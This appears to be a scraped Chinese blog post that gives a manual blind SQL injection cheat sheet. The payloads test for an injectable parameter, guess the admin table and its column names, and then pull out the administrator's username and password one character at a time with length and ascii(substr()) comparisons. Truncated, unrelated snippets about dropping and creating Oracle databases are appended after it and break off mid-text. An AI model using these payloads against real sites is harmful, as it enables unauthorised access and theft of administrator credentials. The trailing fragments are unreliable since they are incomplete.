日常判斷注入點 and 1=1
and 1=2
爆破手段:
判斷表and (select count(*) from admin)<>0 返回正常,則有admin表,否則,無
判斷列名
and (select count(列名) forom admin) <> 0 返回正常,則有該列名,否則,無
爆管理員賬號密碼:
先判斷管理員賬戶字元長度
and (select count(*) from admin where length(name(此處是表中管理員賬戶的列名)) >= num) =1 這裡的num是猜測的數字(但是如果開發者在建表時針對使用者名稱的資料型別使用的是char而不是varchar呢)
爆使用者名稱的第乙個,第二個,第三個。。。。字元
and (select count(*) from admin where ascii(substr(name,1,1)) >=num) =1這裡的num是猜測的數字,再對照ascii表去找出對應的字元
and (select count(*) from admin where ascii(substr(name,2,1)) >=num) =1
and (select count(*) from admin where ascii(substr(name,3,1)) >=num) =1
......
依次爆出賬戶名的全部字元
判斷密碼的字元長度
and (select count(*) from admin where length(pwd(此處是表中管理員密碼的列名)) >= num) =1
爆密碼的第乙個,第二個,第三個。。。。字元
and (select count(*) from admin where ascii(substr(pwd,1,1)) >=num) =1
and (select count(*) from admin where ascii(substr(pwd,2,1)) >=num) =1
and (select count(*) from admin where ascii(substr(pwd,3,1)) >=num) =1
......
依次爆出密碼的全部字元
oracle手動刪除資料庫
特權使用者可以使用 drop database 方式刪除資料庫,但此時的資料庫必須處於 mount 狀態,並且一 restrict 方式裝載資料庫。1 在命令提示符下以具有 sysdba 身份的使用者進行登陸。sqlplus sys pwd as sysdba 2 通過資料字典視 global na...
手動建立oracle資料庫例項
1 首先設定 oracle sid manual 2 建立密碼檔案 oracle myorcl dbs orapwd file orapmanual password oracle 3 建立所需的目錄結構 oracle myorcl admin mkdir manual 然後進入manual目錄建立...
手動刪除資料庫 oracle
手動刪 除oracle資料 庫 在很多情況下,或無法使用dbca工具的時候,我們需要手動來刪除資料庫。對此,可以借助drop database命令來實現,下面的描述中給出手動刪除資料庫 的具體步驟,包含檔案系統資料庫以及asm資料庫。環境 oracle enterprise linux 5.4 or...